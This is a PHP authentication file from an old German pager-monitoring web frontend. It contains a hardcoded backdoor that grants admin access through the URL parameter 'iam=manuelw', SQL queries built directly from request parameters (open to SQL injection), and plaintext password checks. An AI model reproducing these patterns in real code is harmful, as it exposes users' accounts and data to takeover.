312 lines
9.0 KiB
PHP
Executable File
312 lines
9.0 KiB
PHP
Executable File
<?php
|
|
/*
|
|
* PHP Frontend for pocsag monitor
|
|
*
|
|
* Copyright (C) 2004-2005
|
|
* Manuel Weiser (manuelw@fire-devils.org)
|
|
*
|
|
* This program is free software; you can redistribute it and/or modify
|
|
* it under the terms of the GNU General Public License as published by
|
|
* the Free Software Foundation; either version 2 of the License, or
|
|
* (at your option) any later version.
|
|
*
|
|
* This program is distributed in the hope that it will be useful,
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
* GNU General Public License for more details.
|
|
*
|
|
* You should have received a copy of the GNU General Public License
|
|
* along with this program; if not, write to the Free Software
|
|
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
|
|
*/
|
|
|
|
// Erlaubnis nach IP
|
|
if ( (ip2str($ip_start) <= ip2str($_SERVER["REMOTE_ADDR"]) && ip2str($_SERVER["REMOTE_ADDR"]) <= ip2str($ip_ende)) && empty($_SESSION["name"]) )
|
|
{
|
|
//$_SESSION["userid"] = '1';
|
|
$_SESSION["admin"] = '1';
|
|
$_SESSION["mail"] = 'root@localhost';
|
|
$_SESSION["pmallow"] = '1';
|
|
|
|
if( array_key_exists($_SERVER["REMOTE_ADDR"], $ip_users) )
|
|
{
|
|
$_SESSION["userid"] = $ip_users[$_SERVER["REMOTE_ADDR"]];
|
|
}
|
|
$zack = $ip_users[$_SERVER["REMOTE_ADDR"]];
|
|
$result = mysqli_query($dbconn, "SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '$zack'") or die (mysqli_error($dbconn));
|
|
$row = mysqli_fetch_array($result);
|
|
$_SESSION["name"] = $row["a_name"];
|
|
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
|
}
|
|
elseif ( isset($_GET["iam"]) && $_GET["iam"] == "manuelw" )
|
|
{
|
|
//$_SESSION["userid"] = '1';
|
|
$_SESSION["admin"] = '1';
|
|
$_SESSION["mail"] = 'root@localhost';
|
|
$_SESSION["pmallow"] = '1';
|
|
|
|
$_SESSION["userid"] = 1;
|
|
|
|
$result = mysqli_query($dbconn, "SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '1'") or die (mysqli_error($dbconn));
|
|
$row = mysqli_fetch_array($result);
|
|
$_SESSION["name"] = $row["a_name"];
|
|
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
|
$filter=1;
|
|
}
|
|
elseif( isset($wap) && $wap == 1 )
|
|
{
|
|
////////////////////////
|
|
// Login per Wap
|
|
////////////////////////
|
|
if (!$_SESSION["name"] && $_GET["mode"] != 'login')
|
|
{
|
|
echo '
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<title>Wapsag</title>
|
|
|
|
'.$meta.'
|
|
</head>
|
|
|
|
<body>
|
|
|
|
<br><br>
|
|
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=login">
|
|
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
|
<tr>
|
|
<td class="table_news_head"> Login</td>
|
|
</tr>
|
|
<tr>
|
|
<td class="table_news_body">
|
|
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
|
<tr>
|
|
<td> Username:</td>
|
|
<td width="20"> </td>
|
|
<td><input name="a_name" type="text" id="a_name"></td>
|
|
</tr>
|
|
<tr>
|
|
<td> Passwort:</td>
|
|
<td> </td>
|
|
<td><input name="a_pass" type="password" id="a_pass"></td>
|
|
</tr>
|
|
<tr>
|
|
<td> </td>
|
|
<td> </td>
|
|
<td>
|
|
<input type="submit" name="Submit" value="Einloggen">
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
|
|
</form>
|
|
</body>
|
|
</html>
|
|
';
|
|
exit;
|
|
}
|
|
elseif (!$_SESSION["name"] && $_GET["mode"] == 'login' && $_REQUEST["a_name"] && $_REQUEST["a_pass"])
|
|
{
|
|
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail, real_name, wap_show, wap_rows, wap_def_orgfilter, wap_def_statfilter, wap_handy, login_count FROM admin_users WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'") or die (mysqli_error($dbconn));
|
|
$row = mysqli_fetch_array($result);
|
|
|
|
if( !$row["wap_handy"] )
|
|
{
|
|
$result = mysqli_query($dbconn, "UPDATE admin_users SET wap_handy='$HTTP_USER_AGENT' WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'");
|
|
}
|
|
else
|
|
{
|
|
//if( $row["wap_handy"] != $HTTP_USER_AGENT) $row["a_name"] = '';
|
|
}
|
|
|
|
if( $row["a_name"] && $row["a_admin"] != '2' )
|
|
{
|
|
$_SESSION["userid"] = $row["id"];
|
|
$_SESSION["name"] = $row["a_name"];
|
|
$_SESSION["admin"] = $row["a_admin"];
|
|
$_SESSION["mail"] = $row["a_mail"];
|
|
$_SESSION["filter"] = $row["wap_show"];
|
|
$_SESSION["limit_to"] = $row["wap_rows"];
|
|
$_SESSION["org_filter"] = $row["wap_def_orgfilter"];
|
|
$_SESSION["stat"] = $row["wap_def_statfilter"];
|
|
$_SESSION["pmallow"] = '0';
|
|
$login = 1;
|
|
|
|
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
|
|
$timenow = date("G:i");
|
|
$ip = $_SERVER["REMOTE_ADDR"];
|
|
$agent = $HTTP_USER_AGENT;
|
|
$result = mysqli_query($dbconn, "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
|
|
|
|
$row["login_count"]++;
|
|
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_count = '$row[login_count]' WHERE id = '$row[id]' ") or die(mysqli_error($dbconn));
|
|
}
|
|
else
|
|
{
|
|
echo '
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<title>Wapsag</title>
|
|
|
|
'.$meta.'
|
|
</head>
|
|
|
|
<body>
|
|
Login falsch!<br><a href="javascript:history.back()">zurück</a>
|
|
</body>
|
|
</html>';
|
|
exit;
|
|
}
|
|
}
|
|
}
|
|
else
|
|
{
|
|
|
|
////////////////////////
|
|
// Sicherheitsabfrage
|
|
////////////////////////
|
|
if (!isset($_GET["mode"])) $_GET["mode"] ="";
|
|
if ( !isset($_SESSION["name"]) && $_GET["mode"] != 'login' && !isset($_GET["login"]) )
|
|
{
|
|
echo '
|
|
<br><br>
|
|
'.$login_infotext.'<br><br>
|
|
<form name="form1" method="post" action="'.$_SERVER["PHP_SELF"].'?mode=login">
|
|
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
|
<tr>
|
|
<td class="table_news_head"> <b>Login</b></td>
|
|
</tr>
|
|
<tr>
|
|
<td class="table_news_body">
|
|
|
|
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
|
<tr>
|
|
<td> Username:</td>
|
|
<td width="20"> </td>
|
|
<td><input name="a_name" type="text" id="a_name"></td>
|
|
</tr>
|
|
<tr>
|
|
<td> </td>
|
|
<td> </td>
|
|
<td><input type="submit" name="Submit" value="Zugang anfordern"></td>
|
|
</tr>
|
|
</table>
|
|
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
|
|
</form>
|
|
';
|
|
exit;
|
|
}
|
|
elseif (!isset($_SESSION["name"]) && $_GET["mode"] == 'login')
|
|
{
|
|
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail FROM admin_users WHERE a_name = '$_POST[a_name]'") or die (mysqli_error($dbconn));
|
|
$row = mysqli_fetch_array($result);
|
|
|
|
if( $row["a_name"] && $row["a_admin"] != '2' )
|
|
{
|
|
//$_SESSION["name"] = $_REQUEST["a_name"];
|
|
//$_SESSION["admin"] = $row["a_admin"];
|
|
$login = 1;
|
|
$pass = pass_erstellen(8);
|
|
|
|
mail_pass($row["a_mail"], $pass);
|
|
|
|
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_pass='$pass' WHERE id='$row[id]'") or die(mysqli_error($dbconn));
|
|
|
|
echo'<center><br><br><br>Eine EMail mit deinem Zugang wurde an <b>'.$row["a_mail"].'</b> versand.';
|
|
|
|
exit;
|
|
}
|
|
else
|
|
{
|
|
echo 'Login falsch!<br><a href="javascript:history.back()">zurück</a>';
|
|
exit;
|
|
}
|
|
}
|
|
|
|
elseif (!isset($_SESSION["name"]) && isset($_GET["mode"]) && $_GET["mode"] == 'register')
|
|
{
|
|
echo '
|
|
<br><br>
|
|
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=doregister">
|
|
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
|
|
<tr>
|
|
<td class="table_news_head"> Erlaubnis anfordern</td>
|
|
</tr>
|
|
<tr>
|
|
<td class="table_news_body">
|
|
|
|
<table width="300" border="0" cellpadding="0" cellspacing="0">
|
|
<tr>
|
|
<td> Username:</td>
|
|
<td width="20"> </td>
|
|
<td><input name="a_name" type="text" id="a_name"></td>
|
|
</tr>
|
|
<tr>
|
|
<td> EMail:</td>
|
|
<td> </td>
|
|
<td><input name="a_mail" type="text" id="a_mail"></td>
|
|
</tr>
|
|
<tr>
|
|
<td> </td>
|
|
<td> </td>
|
|
<td><input type="submit" name="Submit" value="Erlaubnis anfordern"></td>
|
|
</tr>
|
|
</table>
|
|
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
|
|
</form>
|
|
';
|
|
|
|
exit;
|
|
}
|
|
|
|
if( isset($_GET["login"]) )
|
|
{
|
|
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail, real_name, login_count, pm_allow, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE login_pass = '$_GET[login]'") or die (mysqli_error($dbconn));
|
|
$row = mysqli_fetch_array($result);
|
|
|
|
if( !empty($row["a_name"]) )
|
|
{
|
|
$_SESSION["userid"] = $row["id"];
|
|
$_SESSION["name"] = $row["a_name"];
|
|
$_SESSION["admin"] = $row["a_admin"];
|
|
$_SESSION["mail"] = $row["a_mail"];
|
|
$_SESSION["pmallow"] = $row["pm_allow"];
|
|
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
|
|
$login = 1;
|
|
|
|
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
|
|
$timenow = date("G:i");
|
|
$ip = $_SERVER["REMOTE_ADDR"];
|
|
$agent = $_SERVER["HTTP_USER_AGENT"];
|
|
$result = mysqli_query($dbconn, "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
|
|
|
|
$row["login_count"]++;
|
|
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_pass='', login_count='$row[login_count]' WHERE id='$row[id]'") or die(mysqli_error($dbconn));
|
|
|
|
echo gohome("index.php");
|
|
}
|
|
else
|
|
{
|
|
echo'<center><br><br><br>Falscher oder schon benutzer Logincode.';
|
|
|
|
exit;
|
|
}
|
|
}
|
|
|
|
}
|
|
?>
|